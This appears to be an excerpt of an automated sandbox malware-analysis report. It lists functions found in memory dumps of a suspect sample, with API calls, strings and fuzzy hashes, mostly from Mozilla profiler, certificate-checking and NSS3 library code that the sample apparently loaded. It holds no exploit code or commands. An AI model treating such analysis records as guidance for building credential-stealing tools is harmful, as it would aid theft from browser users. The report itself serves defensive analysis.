                                                                                                                                                                                          Function 00031E1F Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3494564517-0
                                                                                                                                                                                          • Opcode ID: 94dba966497ff575e7e070126db666522a5f2bfb942cd3a7767b570bfec09da8
                                                                                                                                                                                          • Instruction ID: 9bd168a6f717692cc360f17fa2500345e3feef34a1a96826c252d41ce76ebca7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94dba966497ff575e7e070126db666522a5f2bfb942cd3a7767b570bfec09da8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E02B36A017141FC773092A88049B6BBDF9FCBF64F594169DE48CB314D932CC0182E0
                                                                                                                                                                                          Function 00027EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 339b21672d8ba9e2b68c0364d62b84964d79378cdd980625ecc01bc9c64ad997
                                                                                                                                                                                          • Instruction ID: 359fbff36a3f5ec1acdbc0bca349bc0e3f76c26a8f98976ed9fc3360e80b3e4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 339b21672d8ba9e2b68c0364d62b84964d79378cdd980625ecc01bc9c64ad997
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E012B1A10208BFEF40DBA9DC45A9EBBF8EF44354F144065F909D3241E670EE00DB51

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 6C425440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C425492
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4254A8
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4254BE
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C4254DB
                                                                                                                                                                                            • Part of subcall function 6C44AB3F: EnterCriticalSection.KERNEL32(6C49E370,?,?,6C413527,6C49F6CC,?,?,?,?,?,?,?,?,6C413284), ref: 6C44AB49
                                                                                                                                                                                            • Part of subcall function 6C44AB3F: LeaveCriticalSection.KERNEL32(6C49E370,?,6C413527,6C49F6CC,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44AB7C
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: GetCurrentProcess.KERNEL32(?,6C4131A7), ref: 6C44CBF1
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4131A7), ref: 6C44CBFA
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C4254F9
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C425516
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42556A
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C425577
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000070), ref: 6C425585
                                                                                                                                                                                          • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C425590
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C4255E6
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C425606
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C425616
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C42563E
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C425646
                                                                                                                                                                                          • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C42567C
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4256AE
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C4256E8
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C425707
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C42570F
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C425729
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C42574E
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C42576B
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C425796
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C4257B3
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C4257CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP, xrefs: 6C4255E1
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C4257AE
                                                                                                                                                                                          • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C42548D
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C425717
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C425724
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C4257C5
                                                                                                                                                                                          • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4254B9
                                                                                                                                                                                          • MOZ_BASE_PROFILER_HELP, xrefs: 6C425511
                                                                                                                                                                                          • GeckoMain, xrefs: 6C425554, 6C4255D5
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C425C56
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C425B38
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C425AC9
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C425749
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C425D2B
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C425CF9
                                                                                                                                                                                          • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C425BBE
                                                                                                                                                                                          • [I %d/%d] profiler_init, xrefs: 6C42564E
                                                                                                                                                                                          • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C42584E
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C425791
                                                                                                                                                                                          • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4254A3
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C4256E3
                                                                                                                                                                                          • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C425766
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C425D1C
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C425D01
                                                                                                                                                                                          • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C425D24
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                          • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                          • API String ID: 3686969729-1266492768
                                                                                                                                                                                          • Opcode ID: bde0d14a9c027e05947c493164de02456a2412a6936269c192958e243d1dc633
                                                                                                                                                                                          • Instruction ID: 3cc18482e24f105bd9a39c8c81d9002f90edacb6a1aa577f4e66bc5e2b99a25b
                                                                                                                                                                                          • Opcode Fuzzy Hash: bde0d14a9c027e05947c493164de02456a2412a6936269c192958e243d1dc633
                                                                                                                                                                                          • Instruction Fuzzy Hash: 792234B09043609FEB00EF74840AF6A7BB5AF5730DF444529E84A87B45EB39C855CB93
                                                                                                                                                                                          Function 6C426C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C426CCC
                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C426D11
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0000000C), ref: 6C426D26
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C426D35
                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C426D53
                                                                                                                                                                                          • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C426D73
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C426D80
                                                                                                                                                                                          • CertGetNameStringW.CRYPT32 ref: 6C426DC0
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6C426DDC
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C426DEB
                                                                                                                                                                                          • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C426DFF
                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C426E10
                                                                                                                                                                                          • CryptMsgClose.CRYPT32(00000000), ref: 6C426E27
                                                                                                                                                                                          • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C426E34
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C426EF9
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000000), ref: 6C426F7D
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C426F8C
                                                                                                                                                                                          • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C42709D
                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C427103
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C427153
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C427176
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C427209
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42723A
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42726B
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42729C
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C4272DC
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C42730D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C4273C2
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4273F3
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4273FF
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C427406
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C42740D
                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C42741A
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(?), ref: 6C42755A
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C427568
                                                                                                                                                                                          • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C427585
                                                                                                                                                                                          • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C427598
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4275AC
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                          • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                          • API String ID: 3256780453-3980470659
                                                                                                                                                                                          • Opcode ID: 5dbdfda0d603af58ddfde679579b8c5e39e520480997f7b0d1b9c6e68d3f52d8
                                                                                                                                                                                          • Instruction ID: 970969d013f53d4c479da5302f00e4a3e7d972d2d2fa432e5c11c399a9c40926
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbdfda0d603af58ddfde679579b8c5e39e520480997f7b0d1b9c6e68d3f52d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E552E3B1A052249FEB21EF24CC85FAA77B8EF55708F104199E909A7740DB34AF85CF91
                                                                                                                                                                                          Function 6C556D90 Relevance: 62.1, APIs: 33, Strings: 2, Instructions: 809COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A8EC,0000006C), ref: 6C556DC6
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A958,0000006C), ref: 6C556DDB
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65A9C4,00000078), ref: 6C556DF1
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65AA3C,0000006C), ref: 6C556E06
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C65AAA8,00000060), ref: 6C556E1C
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C556E38
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C556E76
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C55726F
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C557283
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • !, xrefs: 6C557123
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C55720A, 6C55738D, 6C5573A8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                          • String ID: !$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.
                                                                                                                                                                                          • API String ID: 3333340300-4249839731
                                                                                                                                                                                          • Opcode ID: c782b07415e2240538cc1082fc0ee240d40d0dee73dbb5a64c8dbdbdf67d021a
                                                                                                                                                                                          • Instruction ID: 7ac9e5c91d561ccea32a6d97f21fd5ba10c96eb8900cc7a1ccfa34bd2c12e9b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c782b07415e2240538cc1082fc0ee240d40d0dee73dbb5a64c8dbdbdf67d021a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3729175D05215DFDF60DF28CC88B9ABBB5AF49304F5081AAD80DA7701EB31AA94CF91
                                                                                                                                                                                          Function 6C4734A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473527
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47355B
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4735BC
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4735E0
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47363A
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473693
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4736CD
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473703
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47373C
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473775
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47378F
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473892
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4738BB
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473902
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473939
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473970
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4739EF
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473A26
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473AE5
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473E85
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473EBA
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C473EE2
                                                                                                                                                                                            • Part of subcall function 6C476180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C4761DD
                                                                                                                                                                                            • Part of subcall function 6C476180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C47622C
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4740F9
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47412F
